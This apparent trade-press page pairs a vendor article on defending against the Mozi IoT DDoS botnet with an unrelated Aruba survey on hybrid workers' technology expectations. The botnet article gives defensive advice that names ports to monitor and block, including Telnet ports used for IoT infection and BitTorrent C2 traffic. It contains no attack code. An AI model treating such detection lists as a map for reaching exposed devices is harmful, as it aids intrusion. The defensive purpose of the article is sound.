By: Amr Alashaal, Regional Vice President – Middle East at A10 Networks

Malware has been playing an important role in the expansion of botnets, automating the process of bot infection and recruitment. These botnets are then used to launch large scale DDoS attacks. One highly prevalent malware in the DDoS world is Mozi.

Mozi is a DDoS-focused botnet that utilizes a large set of Remote Code Executions (RCEs) to leverage CVEs in IoT devices for infection. These IoT devices include readily available and commonly used DVRs and network gateways. Once infected, the botnet uses peer-to-peer connectivity to send and receive configuration updates and attack commands. Mozi was first identified in 2019 and has been evolving and increasing in size ever since. It can now persist on network devices by infiltrating the device’s file system, remaining functional even after the device has been rebooted. During the first half of 2021, Mozi topped out at over 360,000 unique systems using more than 285,000 unique source IP addresses, likely due to address translation.

In order to protect their networks and resources, organizations need to take the following steps to block systems infected by Mozi and the malicious traffic generated by them:

1. Never Trust, Always Verify: Incorporate the Zero Trust model and its key principles into your security strategy. Create micro-perimeters within your networks. Limit access to your resources and invest into modern, AI/ML-based solutions. Ensure visibility into not only the endpoints and network nodes, but also into users, their activities, and workflows.
2. Investigate Whether You are Already Infected: The initial infection of Mozi comes in the form of RCEs sent using ports 80, 8080, 8443, etc. This can make initial infections stand out, which can help in tracking them with low false positives. If your network devices suddenly start generating abnormal amounts of TCP or UDP traffic, immediately isolate suspicious devices and limit the traffic originating from them. If this is not possible, then apply global rate limiting on all traffic until you track the source.
3. Observe and Block Commonly Exploited Ports: Incorporate the Zero Trust Closely monitor any traffic using TCP ports 60001, 37215, 5555, 52869, 49152, both before or after a suspected infection. While these aren’t the only ports Mozi uses, they may help find the needle in the haystack. As a general good practice, monitor and block sources that send TCP SYNs to ports 23 and 2323 as most malwares use Telnet to initiate IoT device infections.
4. Take a Closer Look at the Payloads: If your network devices are generating large amounts of traffic, look at the payloads (i.e., the HTTP POST as shown on page 13). RegEx can be used to filter these malicious traffic requests out and block them before they infect other devices.
5. Block BitTorrent: Since BitTorrent is one of the most common peer-to-peer networks used by Mozi for Command and Control (C2) communications, any BitTorrent traffic coming into or going out of the network should be blocked. The sheer amount of BitTorrent traffic could be a dead giveaway of an infection depending on your customer type.
6. Ensure Your Security is up to Date: Make sure your security infrastructure is updated regularly and that your IoT devices are running the latest version of firmware with all the necessary security patches applied. Keep track of CVEs for your network devices and seek out help if there are any patches available. If fixes are not readily available, take appropriate action based on the particular CVEs.
7. Employ or Review DDoS Baselining and AI/ML Techniques: Using modern DDoS techniques like baselining to see anomalous behavior versus historical norms, and AI/ML techniques, for detection and zero-day attack prevention, can be a force multiplier for your security team as manual tasks can be discovered and dealt with efficiently and 24×7.

Business leaders must strike a balance between flexibility and security to address risky behaviours and evolving expectations of today’s tech-savvy workforce

After years of responding to the needs of Gen X and Gen Y, a new study from Aruba, a Hewlett Packard Enterprise company, suggests employers have a whole new generation to grapple with post-pandemic – with 85% of hybrid workers saying they identify with the traits of the emerging Generation Novel (Gen-N).

Coined by digital anthropologist Brian Solis, Gen-N describes a cross-generational cohort of people who thrive on digital-first experiences, and place greater value on personalization, customization, and transparency from the brands they buy from, work for, and support. Above all else, they also understand, use and demand more from technology than ever before – both at home and work.

According to the study of 5,018 hybrid workers across EMEA, 78% of respondents say they use technology more now than they did before COVID-19, and 75% consider themselves to be ‘digitally savvy’. Sixty-nine percent of respondents agree they now have more of an opinion on the technology they use at work and 71% feel it’s important to be able to customize their workplace tech set-up to suit their individual preferences.

The survey also revealed the risks this new generation will bring to the workplace if their expectations continue to go unmet. As it stands, only 38% of respondents say they have any significant choice in their workplace technology. Without the right technology, workers indicated they will experience decreased productivity (35%) and a poorer work/life balance (23%). Gen-N’s expectations around increased flexibility and confidence in their technical abilities also opens businesses up to a number of security risks relating to where, when, and what employees connect to the network – with 50% of respondents, for example, claiming they are more likely to try to resolve a tech issue themselves now than they would have been before the pandemic.

Additional key findings from the report reveal:

Hybrid workers have a new perspective on the role of workplace technology:

• 80% of our respondents say their company must maintain policies that encourage healthy technology use.
• While 73% believe technology has a role to play in fostering an inclusive environment in the new hybrid workplace, 44% believe it is not currently doing so.

Hybrid workers bring new risks to the workplace if their needs go unmet:

• When encountering a tech issue at work, nearly three quarters (74%) of hybrid workers say they expect it to be resolved in 20 minutes or less – and over two fifths (42%) in under 10 minutes.
• Over half (55%) of our survey respondents admit to connecting to a non-password protected public network at least once a week, but only a third (33%) consistently think of the security risks in doing so.
• Meanwhile, as many as 82% are still using their personal mobile device to access work information.

“Our research suggests that this emerging generation of hybrid workers, with its evolving behaviours and heightened expectations, will put new demands on employers when it comes to workplace technology,” said Morten Illum, Vice President, EMEA for Aruba, a Hewlett Packard Enterprise company. “In order to mitigate the security risk that Gen-N poses, as well as boost efficiency within their workforce and support their employees, businesses must address these new needs. Striking the balance between an open but secure network will afford employees the flexibility, freedom and personalization they now seek, without compromising on security.”

To read the full report, including recommendations on the actions business leaders much take to meet the needs of Gen-N in a hybrid workplace, visit https://www.arubanetworks.com/assets/eo/eBook_Hybrid-Workplace-Generation-Novel.pdf